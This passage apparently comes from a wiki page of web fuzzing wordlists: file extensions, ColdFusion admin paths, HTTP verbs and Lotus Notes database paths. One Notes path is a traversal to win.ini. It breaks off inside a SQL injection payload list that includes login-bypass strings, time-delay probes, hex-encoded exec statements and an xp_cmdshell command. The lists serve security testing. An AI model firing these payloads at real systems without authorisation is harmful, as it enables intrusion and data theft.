.vcs&lt;br /&gt;
.vdb&lt;br /&gt;
.vdx&lt;br /&gt;
.vfs&lt;br /&gt;
.vi&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vmt&lt;br /&gt;
.voi&lt;br /&gt;
.vok&lt;br /&gt;
.vrd&lt;br /&gt;
.vscontent&lt;br /&gt;
.vsx&lt;br /&gt;
.vtx&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb2&lt;br /&gt;
.wb3&lt;br /&gt;
.wdb&lt;br /&gt;
.wdq&lt;br /&gt;
.wea&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.wgp&lt;br /&gt;
.wgt&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wjr&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wki&lt;br /&gt;
.wks&lt;br /&gt;
.wku&lt;br /&gt;
.wlmp&lt;br /&gt;
.wmdb&lt;br /&gt;
.wor&lt;br /&gt;
.wpc&lt;br /&gt;
.wpf&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtb&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xdp&lt;br /&gt;
.xds&lt;br /&gt;
.xef&lt;br /&gt;
.xem&lt;br /&gt;
.xfd&lt;br /&gt;
.xfo&lt;br /&gt;
.xft&lt;br /&gt;
.xl&lt;br /&gt;
.xlc&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsb&lt;br /&gt;
.xlsm&lt;br /&gt;
.xlsx&lt;br /&gt;
.xlt&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xlw&lt;br /&gt;
.xmcd&lt;br /&gt;
.xml&lt;br /&gt;
.xmlper&lt;br /&gt;
.xmpz&lt;br /&gt;
.xpg&lt;br /&gt;
.xpj&lt;br /&gt;
.xpm&lt;br /&gt;
.xpt&lt;br /&gt;
.xrp&lt;br /&gt;
.xsl&lt;br /&gt;
.xslt&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.yam&lt;br /&gt;
.zap&lt;br /&gt;
.zdb&lt;br /&gt;
.zdc&lt;br /&gt;
.zix&lt;br /&gt;
.zmc&lt;br /&gt;
.zpl&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Compressed File Types - (Update: 16 March 2010 - Total Statements: 187) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  Compressed File Types - (Update: 16 March 2010 - Total Statements: 187)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
.0&lt;br /&gt;
.000&lt;br /&gt;
.7z&lt;br /&gt;
.a00&lt;br /&gt;
.a01&lt;br /&gt;
.a02&lt;br /&gt;
.ace&lt;br /&gt;
.ain&lt;br /&gt;
.alz&lt;br /&gt;
.apz&lt;br /&gt;
.ar&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ari&lt;br /&gt;
.arj&lt;br /&gt;
.ark&lt;br /&gt;
.axx&lt;br /&gt;
.b64&lt;br /&gt;
.ba&lt;br /&gt;
.bh&lt;br /&gt;
.boo&lt;br /&gt;
.bz&lt;br /&gt;
.bz2&lt;br /&gt;
.bzip&lt;br /&gt;
.bzip2&lt;br /&gt;
.c00&lt;br /&gt;
.c01&lt;br /&gt;
.c02&lt;br /&gt;
.car&lt;br /&gt;
.cb7&lt;br /&gt;
.cbr&lt;br /&gt;
.cbt&lt;br /&gt;
.cbz&lt;br /&gt;
.cp9&lt;br /&gt;
.cpgz&lt;br /&gt;
.cpt&lt;br /&gt;
.dar&lt;br /&gt;
.dd&lt;br /&gt;
.deb&lt;br /&gt;
.dgc&lt;br /&gt;
.dist&lt;br /&gt;
.ecs&lt;br /&gt;
.efw&lt;br /&gt;
.epi&lt;br /&gt;
.f&lt;br /&gt;
.fdp&lt;br /&gt;
.gca&lt;br /&gt;
.gz&lt;br /&gt;
.gzi&lt;br /&gt;
.gzip&lt;br /&gt;
.ha&lt;br /&gt;
.hbc&lt;br /&gt;
.hbc2&lt;br /&gt;
.hbe&lt;br /&gt;
.hki&lt;br /&gt;
.hki1&lt;br /&gt;
.hki2&lt;br /&gt;
.hki3&lt;br /&gt;
.hpk&lt;br /&gt;
.hyp&lt;br /&gt;
.ice&lt;br /&gt;
.ipg&lt;br /&gt;
.ipk&lt;br /&gt;
.ish&lt;br /&gt;
.j&lt;br /&gt;
.jar.pack&lt;br /&gt;
.jgz&lt;br /&gt;
.jic&lt;br /&gt;
.kgb&lt;br /&gt;
.lbr&lt;br /&gt;
.lemon&lt;br /&gt;
.lha&lt;br /&gt;
.lnx&lt;br /&gt;
.lqr&lt;br /&gt;
.lz&lt;br /&gt;
.lzh&lt;br /&gt;
.lzm&lt;br /&gt;
.lzma&lt;br /&gt;
.lzo&lt;br /&gt;
.lzx&lt;br /&gt;
.md&lt;br /&gt;
.mint&lt;br /&gt;
.mou&lt;br /&gt;
.mpkg&lt;br /&gt;
.mzp&lt;br /&gt;
.oar&lt;br /&gt;
.p7m&lt;br /&gt;
.pack.gz&lt;br /&gt;
.package&lt;br /&gt;
.pae&lt;br /&gt;
.pak&lt;br /&gt;
.paq6&lt;br /&gt;
.paq7&lt;br /&gt;
.paq8&lt;br /&gt;
.par&lt;br /&gt;
.par2&lt;br /&gt;
.pbi&lt;br /&gt;
.pcv&lt;br /&gt;
.pea&lt;br /&gt;
.pet&lt;br /&gt;
.pf&lt;br /&gt;
.pim&lt;br /&gt;
.pit&lt;br /&gt;
.piz&lt;br /&gt;
.pkg&lt;br /&gt;
.pup&lt;br /&gt;
.puz&lt;br /&gt;
.pwa&lt;br /&gt;
.qda&lt;br /&gt;
.r0&lt;br /&gt;
.r00&lt;br /&gt;
.r01&lt;br /&gt;
.r02&lt;br /&gt;
.r03&lt;br /&gt;
.r1&lt;br /&gt;
.r2&lt;br /&gt;
.r30&lt;br /&gt;
.rar&lt;br /&gt;
.rev&lt;br /&gt;
.rk&lt;br /&gt;
.rnc&lt;br /&gt;
.rp9&lt;br /&gt;
.rpm&lt;br /&gt;
.rte&lt;br /&gt;
.rz&lt;br /&gt;
.rzs&lt;br /&gt;
.s00&lt;br /&gt;
.s01&lt;br /&gt;
.s02&lt;br /&gt;
.s7z&lt;br /&gt;
.sar&lt;br /&gt;
.sdc&lt;br /&gt;
.sdn&lt;br /&gt;
.sea&lt;br /&gt;
.sen&lt;br /&gt;
.sfs&lt;br /&gt;
.sfx&lt;br /&gt;
.sh&lt;br /&gt;
.shar&lt;br /&gt;
.shk&lt;br /&gt;
.shr&lt;br /&gt;
.sit&lt;br /&gt;
.sitx&lt;br /&gt;
.spt&lt;br /&gt;
.sqx&lt;br /&gt;
.sqz&lt;br /&gt;
.tar&lt;br /&gt;
.tar.gz&lt;br /&gt;
.tar.xz&lt;br /&gt;
.taz&lt;br /&gt;
.tbz&lt;br /&gt;
.tbz2&lt;br /&gt;
.tg&lt;br /&gt;
.tgz&lt;br /&gt;
.tlz&lt;br /&gt;
.tlzma&lt;br /&gt;
.txz&lt;br /&gt;
.tz&lt;br /&gt;
.uc2&lt;br /&gt;
.uha&lt;br /&gt;
.vem&lt;br /&gt;
.vsi&lt;br /&gt;
.wad&lt;br /&gt;
.war&lt;br /&gt;
.wot&lt;br /&gt;
.xef&lt;br /&gt;
.xez&lt;br /&gt;
.xmcdz&lt;br /&gt;
.xpi&lt;br /&gt;
.xx&lt;br /&gt;
.xz&lt;br /&gt;
.y&lt;br /&gt;
.yz&lt;br /&gt;
.z&lt;br /&gt;
.z01&lt;br /&gt;
.z02&lt;br /&gt;
.z03&lt;br /&gt;
.z04&lt;br /&gt;
.zap&lt;br /&gt;
.zfsendtotarget&lt;br /&gt;
.zip&lt;br /&gt;
.zipx&lt;br /&gt;
.zix&lt;br /&gt;
.zoo&lt;br /&gt;
.zpi&lt;br /&gt;
.zz&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Uncommon Data File Extensions  (Update: 16 March 2010 - Total Statements: 284) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Uncommon Data File Extensions  (Update: 16 March 2010 - Total Statements: 284)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.aao&lt;br /&gt;
.ab2&lt;br /&gt;
.aca&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.agd&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ast&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.bafl&lt;br /&gt;
.bdf&lt;br /&gt;
.bfx&lt;br /&gt;
.bjo&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.chk&lt;br /&gt;
.ckd&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.cmbl&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.csv&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.daf&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.dcf&lt;br /&gt;
.ddt&lt;br /&gt;
.dex&lt;br /&gt;
.dif&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dpx&lt;br /&gt;
.dsd&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.e00&lt;br /&gt;
.ec0&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epw&lt;br /&gt;
.est&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.ev3&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.fbl&lt;br /&gt;
.fdb&lt;br /&gt;
.fid&lt;br /&gt;
.fol&lt;br /&gt;
.gdb&lt;br /&gt;
.gen&lt;br /&gt;
.gnp&lt;br /&gt;
.gpi&lt;br /&gt;
.gpx&lt;br /&gt;
.hcp&lt;br /&gt;
.hdf&lt;br /&gt;
.hmt&lt;br /&gt;
.hsk&lt;br /&gt;
.htg&lt;br /&gt;
.id2&lt;br /&gt;
.ii&lt;br /&gt;
.img&lt;br /&gt;
.ink&lt;br /&gt;
.ins&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.iw&lt;br /&gt;
.jdb&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.jrprint&lt;br /&gt;
.kmz&lt;br /&gt;
.lbx&lt;br /&gt;
.lex&lt;br /&gt;
.lgf&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lnt&lt;br /&gt;
.lst&lt;br /&gt;
.m&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mdb&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mmf&lt;br /&gt;
.mng&lt;br /&gt;
.mpd&lt;br /&gt;
.mpp&lt;br /&gt;
.ms10&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mwx&lt;br /&gt;
.nc&lt;br /&gt;
.ndx&lt;br /&gt;
.nfo&lt;br /&gt;
.not&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.ods&lt;br /&gt;
.oeaccount&lt;br /&gt;
.omcs&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.orx&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ovf&lt;br /&gt;
.paf&lt;br /&gt;
.pbd&lt;br /&gt;
.pcr&lt;br /&gt;
.pdb&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pfc&lt;br /&gt;
.pis&lt;br /&gt;
.pln&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.pst&lt;br /&gt;
.ptz&lt;br /&gt;
.q07&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qfx&lt;br /&gt;
.qpf&lt;br /&gt;
.qpw&lt;br /&gt;
.qsd&lt;br /&gt;
.rcd&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.rmuf&lt;br /&gt;
.roi&lt;br /&gt;
.rrt&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sds&lt;br /&gt;
.ser&lt;br /&gt;
.sgn&lt;br /&gt;
.shs&lt;br /&gt;
.skc&lt;br /&gt;
.slk&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sql&lt;br /&gt;
.stf&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.sy3&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.tax2009&lt;br /&gt;
.tdl&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.teacher&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tsv&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.update&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vcf&lt;br /&gt;
.vdb&lt;br /&gt;
.vfs&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb3&lt;br /&gt;
.wdq&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wks&lt;br /&gt;
.wlmp&lt;br /&gt;
.wpc&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xds&lt;br /&gt;
.xfd&lt;br /&gt;
.xl&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsx&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xml&lt;br /&gt;
.xmpz&lt;br /&gt;
.xsl&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
CFIDE/Administrator/&lt;br /&gt;
CFIDE/Administrator/index.cfm&lt;br /&gt;
CFIDE/Administrator/login.cfm&lt;br /&gt;
CFIDE/Administrator/Application.cfm&lt;br /&gt;
CFIDE/Application.cfm&lt;br /&gt;
CFIDE/adminapi/&lt;br /&gt;
CFIDE/adminapi/Application.cfm&lt;br /&gt;
CFIDE/adminapi/administrator.cfc&lt;br /&gt;
CFIDE/adminapi/base.cfc&lt;br /&gt;
CFIDE/adminapi/customtags/&lt;br /&gt;
CFIDE/adminapi/customtags/l10n.cfm&lt;br /&gt;
CFIDE/adminapi/customtags/resources&lt;br /&gt;
CFIDE/adminapi/customtags/resources/&lt;br /&gt;
CFIDE/adminapi/datasource.cfc&lt;br /&gt;
CFIDE/adminapi/debugging.cfc&lt;br /&gt;
CFIDE/adminapi/eventgateway.cfc&lt;br /&gt;
CFIDE/adminapi/extensions.cfc&lt;br /&gt;
CFIDE/adminapi/mail.cfc&lt;br /&gt;
CFIDE/adminapi/runtime.cfc&lt;br /&gt;
CFIDE/adminapi/security.cfc&lt;br /&gt;
CFIDE/adminapi/_datasource/&lt;br /&gt;
CFIDE/adminapi/_datasource/formatjdbcurl.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/geturldefaults.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setdsn.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setmsaccessregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setsldatasource.cfm&lt;br /&gt;
CFIDE/classes/&lt;br /&gt;
CFIDE/classes/cf-j2re-win.cab&lt;br /&gt;
CFIDE/classes/cfapplets.jar&lt;br /&gt;
CFIDE/classes/images&lt;br /&gt;
CFIDE/componentutils/&lt;br /&gt;
CFIDE/componentutils/Application.cfm&lt;br /&gt;
CFIDE/componentutils/cfcexplorer.cfc&lt;br /&gt;
CFIDE/componentutils/cfcexplorer_utils.cfm&lt;br /&gt;
CFIDE/componentutils/componentdetail.cfm&lt;br /&gt;
CFIDE/componentutils/componentdoc.cfm&lt;br /&gt;
CFIDE/componentutils/componentlist.cfm&lt;br /&gt;
CFIDE/componentutils/gatewaymenu&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menu.cfc&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menunode.cfc&lt;br /&gt;
CFIDE/componentutils/login.cfm&lt;br /&gt;
CFIDE/componentutils/packagelist.cfm&lt;br /&gt;
CFIDE/componentutils/utils.cfc&lt;br /&gt;
CFIDE/componentutils/_component_cfcToHTML.cfm&lt;br /&gt;
CFIDE/componentutils/_component_cfcToMCDL.cfm?&lt;br /&gt;
CFIDE/componentutils/_component_style.cfm&lt;br /&gt;
CFIDE/componentutils/_component_utils.cfm&lt;br /&gt;
CFIDE/debug/&lt;br /&gt;
CFIDE/debug/images/&lt;br /&gt;
CFIDE/debug/includes/&lt;br /&gt;
CFIDE/images/&lt;br /&gt;
CFIDE/images/skins/&lt;br /&gt;
CFIDE/install.cfm&lt;br /&gt;
CFIDE/installers/&lt;br /&gt;
CFIDE/installers/CFMX7DreamWeaverExtensions.mxp&lt;br /&gt;
CFIDE/installers/CFReportBuilderInstaller.exe&lt;br /&gt;
CFIDE/probe.cfm&lt;br /&gt;
CFIDE/scripts/&lt;br /&gt;
CFIDE/scripts/css/&lt;br /&gt;
CFIDE/scripts/xsl/&lt;br /&gt;
CFIDE/wizards/&lt;br /&gt;
CFIDE/wizards/common/&lt;br /&gt;
CFIDE/wizards/common/utils.cfc&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  ll HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
OPTIONS&lt;br /&gt;
GET&lt;br /&gt;
HEAD&lt;br /&gt;
POST&lt;br /&gt;
PUT&lt;br /&gt;
DELETE&lt;br /&gt;
TRACE&lt;br /&gt;
CONNECT&lt;br /&gt;
PROPFIND&lt;br /&gt;
PROPPATCH&lt;br /&gt;
MKCOL&lt;br /&gt;
COPY&lt;br /&gt;
MOVE&lt;br /&gt;
LOCK&lt;br /&gt;
UNLOCK&lt;br /&gt;
VERSION-CONTROL&lt;br /&gt;
REPORT&lt;br /&gt;
CHECKOUT&lt;br /&gt;
CHECKIN&lt;br /&gt;
UNCHECKOUT&lt;br /&gt;
MKWORKSPACE&lt;br /&gt;
UPDATE&lt;br /&gt;
LABEL&lt;br /&gt;
MERGE&lt;br /&gt;
BASELINE-CONTROL&lt;br /&gt;
MKACTIVITY&lt;br /&gt;
ORDERPATCH&lt;br /&gt;
ACL&lt;br /&gt;
PATCH&lt;br /&gt;
SEARCH&lt;br /&gt;
ARBITRARY&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Lotus/Notes Files -(Update: 02 February 2010 - Total Statements: 111)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;/852566C90012664F&lt;br /&gt;
/admin4.nsf&lt;br /&gt;
/admin5.nsf&lt;br /&gt;
/admin.nsf&lt;br /&gt;
/agentrunner.nsf&lt;br /&gt;
/alog.nsf&lt;br /&gt;
/a_domlog.nsf&lt;br /&gt;
/bookmark.nsf&lt;br /&gt;
/busytime.nsf&lt;br /&gt;
/catalog.nsf&lt;br /&gt;
/certa.nsf&lt;br /&gt;
/certlog.nsf&lt;br /&gt;
/certsrv.nsf&lt;br /&gt;
/chatlog.nsf&lt;br /&gt;
/clbusy.nsf&lt;br /&gt;
/cldbdir.nsf&lt;br /&gt;
/clusta4.nsf&lt;br /&gt;
/collect4.nsf&lt;br /&gt;
/da.nsf&lt;br /&gt;
/dba4.nsf&lt;br /&gt;
/dclf.nsf&lt;br /&gt;
/DEASAppDesign.nsf&lt;br /&gt;
/DEASLog01.nsf&lt;br /&gt;
/DEASLog02.nsf&lt;br /&gt;
/DEASLog03.nsf&lt;br /&gt;
/DEASLog04.nsf&lt;br /&gt;
/DEASLog05.nsf&lt;br /&gt;
/DEASLog.nsf&lt;br /&gt;
/decsadm.nsf&lt;br /&gt;
/decslog.nsf&lt;br /&gt;
/DEESAdmin.nsf&lt;br /&gt;
/dirassist.nsf&lt;br /&gt;
/doladmin.nsf&lt;br /&gt;
/domadmin.nsf&lt;br /&gt;
/domcfg.nsf&lt;br /&gt;
/domguide.nsf&lt;br /&gt;
/domlog.nsf&lt;br /&gt;
/dspug.nsf&lt;br /&gt;
/events4.nsf&lt;br /&gt;
/events5.nsf&lt;br /&gt;
/events.nsf&lt;br /&gt;
/event.nsf&lt;br /&gt;
/homepage.nsf&lt;br /&gt;
/iNotes/Forms5.nsf/$DefaultNav&lt;br /&gt;
/jotter.nsf&lt;br /&gt;
/leiadm.nsf&lt;br /&gt;
/leilog.nsf&lt;br /&gt;
/leivlt.nsf&lt;br /&gt;
/log4a.nsf&lt;br /&gt;
/log.nsf&lt;br /&gt;
/l_domlog.nsf&lt;br /&gt;
/mab.nsf&lt;br /&gt;
/mail10.box&lt;br /&gt;
/mail1.box&lt;br /&gt;
/mail2.box&lt;br /&gt;
/mail3.box&lt;br /&gt;
/mail4.box&lt;br /&gt;
/mail5.box&lt;br /&gt;
/mail6.box&lt;br /&gt;
/mail7.box&lt;br /&gt;
/mail8.box&lt;br /&gt;
/mail9.box&lt;br /&gt;
/mail.box&lt;br /&gt;
/msdwda.nsf&lt;br /&gt;
/mtatbls.nsf&lt;br /&gt;
/mtstore.nsf&lt;br /&gt;
/names.nsf&lt;br /&gt;
/nntppost.nsf&lt;br /&gt;
/nntp/nd000001.nsf&lt;br /&gt;
/nntp/nd000002.nsf&lt;br /&gt;
/nntp/nd000003.nsf&lt;br /&gt;
/ntsync45.nsf&lt;br /&gt;
/perweb.nsf&lt;br /&gt;
/qpadmin.nsf&lt;br /&gt;
/quickplace/quickplace/main.nsf&lt;br /&gt;
/reports.nsf&lt;br /&gt;
/sample/siregw46.nsf&lt;br /&gt;
/schema50.nsf&lt;br /&gt;
/setupweb.nsf&lt;br /&gt;
/setup.nsf&lt;br /&gt;
/smbcfg.nsf&lt;br /&gt;
/smconf.nsf&lt;br /&gt;
/smency.nsf&lt;br /&gt;
/smhelp.nsf&lt;br /&gt;
/smmsg.nsf&lt;br /&gt;
/smquar.nsf&lt;br /&gt;
/smsolar.nsf&lt;br /&gt;
/smtime.nsf&lt;br /&gt;
/smtpibwq.nsf&lt;br /&gt;
/smtpobwq.nsf&lt;br /&gt;
/smtp.box&lt;br /&gt;
/smtp.nsf&lt;br /&gt;
/smvlog.nsf&lt;br /&gt;
/srvnam.htm&lt;br /&gt;
/statmail.nsf&lt;br /&gt;
/statrep.nsf&lt;br /&gt;
/stauths.nsf&lt;br /&gt;
/stautht.nsf&lt;br /&gt;
/stconfig.nsf&lt;br /&gt;
/stconf.nsf&lt;br /&gt;
/stdnaset.nsf&lt;br /&gt;
/stdomino.nsf&lt;br /&gt;
/stlog.nsf&lt;br /&gt;
/streg.nsf&lt;br /&gt;
/stsrc.nsf&lt;br /&gt;
/userreg.nsf&lt;br /&gt;
/vpuserinfo.nsf&lt;br /&gt;
/webadmin.nsf&lt;br /&gt;
/web.nsf&lt;br /&gt;
/.nsf/../winnt/win.ini&lt;br /&gt;
/?Open &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== SQL Injection -(Update: 11 August 2009 - Total Statements: 126)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
'sqlvuln&lt;br /&gt;
'+sqlvuln&lt;br /&gt;
sqlvuln;&lt;br /&gt;
(sqlvuln)&lt;br /&gt;
a' or 1=1--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 1=1--&amp;quot;&lt;br /&gt;
 or a = a&lt;br /&gt;
a' or 'a' = 'a&lt;br /&gt;
1 or 1=1&lt;br /&gt;
a' waitfor delay '0:0:10'--&lt;br /&gt;
1 waitfor delay '0:0:10'--&lt;br /&gt;
declare @q nvarchar (4000) select @q =&lt;br /&gt;
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A&lt;br /&gt;
0&lt;br /&gt;
031003000270000&lt;br /&gt;
declare @s varchar(22) select @s =&lt;br /&gt;
0x77616974666F722064656C61792027303A303A31302700 exec(@s)&lt;br /&gt;
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)&lt;br /&gt;
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e&lt;br /&gt;
exec(@s)&lt;br /&gt;
a'&lt;br /&gt;
?&lt;br /&gt;
' or 1=1&lt;br /&gt;
‘ or 1=1 --&lt;br /&gt;
x' AND userid IS NULL; --&lt;br /&gt;
x' AND email IS NULL; --&lt;br /&gt;
anything' OR 'x'='x&lt;br /&gt;
x' AND 1=(SELECT COUNT(*) FROM tabname); --&lt;br /&gt;
x' AND members.email IS NULL; --&lt;br /&gt;
x' OR full_name LIKE '%Bob%&lt;br /&gt;
23 OR 1=1&lt;br /&gt;
'; exec master..xp_cmdshell 'ping 172.10.1.255'--&lt;br /&gt;
'&lt;br /&gt;
'%20or%20''='&lt;br /&gt;
'%20or%20'x'='x&lt;br /&gt;
%20or%20x=x&lt;br /&gt;
')%20or%20('x'='x&lt;br /&gt;
0 or 1=1&lt;br /&gt;
' or 0=0 --&lt;br /&gt;
&amp;quot; or 0=0 --&lt;br /&gt;
or 0=0 --&lt;br /&gt;
' or 0=0 #&lt;br /&gt;
 or 0=0 #&amp;quot;&lt;br /&gt;
or 0=0 #&lt;br /&gt;
' or 1=1--&lt;br /&gt;
&amp;quot; or 1=1--&lt;br /&gt;
' or '1'='1'--&lt;br /&gt;
' or 1 --'&lt;br /&gt;
